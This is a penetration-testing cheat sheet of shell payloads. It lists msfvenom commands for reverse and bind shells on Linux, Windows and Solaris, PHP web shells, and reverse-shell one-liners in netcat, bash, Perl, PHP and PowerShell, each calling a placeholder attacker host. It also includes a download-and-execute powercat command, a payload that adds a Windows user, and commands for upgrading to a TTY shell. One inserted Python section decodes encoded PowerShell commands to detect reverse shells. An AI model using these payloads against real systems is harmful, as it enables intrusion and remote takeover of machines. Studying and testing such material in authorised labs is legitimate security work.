Shells

Listener

rlwrap -cAr nc -lnvp <Port Number>

Web Shells

Locate and upload appropriate shells from /usr/share/webshells


Reverse Shells

Refer to https://www.revshells.com/


Reverse Shells (MSFvenom)

NOTE:

  • shell/reverse_tcp = staged payload

  • shell_reverse_tcp = unstaged payload

  • a staged payload requires a Metasploit multi/handler listener (a plain netcat listener will not deliver the stage)

Formats

Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    ducky-script-psh
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    go
    golang
    hex
    java
    js_be
    js_le
    masm
    nim
    nimlang
    num
    octal
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    rust
    rustlang
    sh
    vbapplication
    vbscript
    zig

Linux

Reverse Shell
  • 32-bit Systems

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
  • 64-bit Systems

msfvenom -p linux/x64/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
Bind Shell
  • 32-bit Systems

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p linux/x86/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p linux/x86/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
  • 64-bit Systems

msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p linux/x64/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p linux/x64/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>

Windows

Reverse Shell
  • 32-bit Systems

msfvenom -p windows/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
msfvenom -p windows/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
  • 64-bit Systems

msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
Bind Shell
  • 32-bit Systems

msfvenom -p windows/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/meterpreter_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
  • 64-bit Systems

msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/x64/meterpreter_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/x64/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/x64/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>

Extras
  • Run command via executable file

msfvenom -a [ x86 | x64 ] --platform Windows -p windows/exec CMD="<Powershell | CMD Command>" -f exe > payload.exe

EXAMPLE:

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).DownloadString('http:///')\"" -f exe > payload.exe

  • Create User via executable file

msfvenom -p windows/adduser USER=<Username> PASS=<Password> -f exe > adduser.exe

SunOS (Solaris)

msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf

Web-based Payloads

PHP

Web Shell
<?php system($_GET['cmd']); ?>
<?php system($_REQUEST['cmd']); ?>
Reverse Shell
<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP[X]

Web Shell

Get from the following

  • /usr/share/webshells/aspx/cmdasp.aspx

  • /usr/share/webshells/aspx/shell.aspx

NOTE: Remember to modify the variables (string host and int port) in shell.aspx

Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f asp > reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f aspx > reverse.aspx

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f war > reverse.war

NodeJS

msfvenom -p nodejs/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port>

Script Language Payloads

Evil-WinRM

NOTE:

  • Verify usability with: crackmapexec winrm <Target IP>

  • Look for port 5985 in nmap scans

evil-winrm -i <Target IP Address> -u <Username> -p <Password>
evil-winrm -i <Target IP Address> -u <Username> -H <NTLM Hash>

Powercat.ps1

powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP Address>/powercat.ps1')
powercat -c <Kali IP Address> -p <Kali Port> -e powershell

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.pl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<Kali IP Address>:<Kali Port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.py

PHP

<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>
php -r '$sock=fsockopen("<Kali IP Address>",<Kali Port>);exec("/bin/sh -i <&3 >&3 2>&3");'

Bash

NOTE: Create a .sh file and paste the following

#!/bin/bash
/bin/bash -c "bash -i >& /dev/tcp/<Kali IP Address>/<Kali Port> 0>&1"

Netcat

  • Linux

nc -nv <Kali IP Address> <Kali Port> -e /bin/bash
nc -nv <Kali IP Address> <Kali Port> -e /bin/sh
nc -nv <Kali IP Address> <Kali Port> -c /bin/bash
nc -nv <Kali IP Address> <Kali Port> -c /bin/sh
  • Windows

nc64.exe <Kali IP Address> <Kali Port> -e cmd
nc64.exe <Kali IP Address> <Kali Port> -e powershell
nc64.exe <Kali IP Address> <Kali Port> -t -e cmd
nc64.exe <Kali IP Address> <Kali Port> -t -e powershell

PowerShell

Do the following in Kali's pwsh

$Text = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>", <Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText

Create the following python script and run it

import base64

# PowerShell -e / -EncodedCommand expects base64 over UTF-16LE text with no BOM,
# so encode with 'utf-16-le' directly instead of slicing the BOM off the 'utf16' codec output
# (the 'utf16' codec also follows the host's byte order, which is wrong on big-endian machines).
payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf-16-le')).decode()

print(cmd)
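The same encoding seen from the defender's side. This is an added example, not part of the original cheat sheet: it pulls the -e/-EncodedCommand argument out of a process-creation command line, decodes it as powershell.exe does (base64 over UTF-16LE), and flags the TCPClient/GetStream/iex combination used on this page. The sample command lines, the marker list and the two-marker threshold are assumptions constructed for the example.

```python
import base64
import re
from typing import Optional

# PowerShell's encoded-command switch in its common abbreviations, case-insensitive.
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Substrings characteristic of the TCPClient one-liner shown on this page (assumed marker list).
REVSHELL_MARKERS = ("System.Net.Sockets.TCPClient", ".GetStream()", "iex ", "Invoke-Expression")

def decode_encoded_command(b64: str) -> str:
    """Decode -EncodedCommand as powershell.exe does: base64 over UTF-16LE text, no BOM."""
    return base64.b64decode(b64, validate=True).decode("utf-16-le")

def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script carried by a command line, or None if absent or undecodable."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return decode_encoded_command(m.group(1))
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None

def reverse_shell_indicators(script: str) -> list:
    """Markers from REVSHELL_MARKERS present in the decoded script (case-insensitive)."""
    lowered = script.lower()
    return [m for m in REVSHELL_MARKERS if m.lower() in lowered]

def triage(cmdline: str) -> dict:
    """Decode and classify one command line; two or more markers together count as suspicious."""
    script = extract_encoded_command(cmdline)
    hits = reverse_shell_indicators(script) if script else []
    return {"encoded": script is not None, "script": script, "indicators": hits, "suspicious": len(hits) >= 2}

def encode_for_sample(script: str) -> str:
    """Build a -e argument the same way the page's script does (used only for the constructed samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample command lines (not real telemetry): a benign one and a non-functional
# fragment of the page's one-liner, enough to carry the markers the detector looks for.
BENIGN = "powershell.exe -nop -e " + encode_for_sample("Get-Date")
REVSHELL = "powershell.exe -nop -w hidden -e " + encode_for_sample(
    '$client = New-Object System.Net.Sockets.TCPClient("10.0.0.1",4444);$stream = $client.GetStream();'
    "$sendback = (iex $data 2>&1 | Out-String);$client.Close()"
)

if __name__ == "__main__":
    for line in (BENIGN, REVSHELL):
        print(triage(line))
```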

TTY Shell

NOTE: Sometimes a reverse shell is not fully interactive. The following commands spawn a proper TTY shell.

Python

python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=xterm-256color; python3 -c 'import pty;pty.spawn("/bin/bash")'

Bash

echo os.system('/bin/bash')
/bin/sh -i
/bin/bash -i
script -qc /bin/bash /dev/null

Perl

perl -e 'exec "/bin/sh";'
exec "/bin/sh";

Ruby

exec "/bin/sh"

Lua

os.execute('/bin/sh')

IRB

exec "/bin/sh"

Vi

:!bash
:set shell=/bin/bash:shell

Nmap

!sh
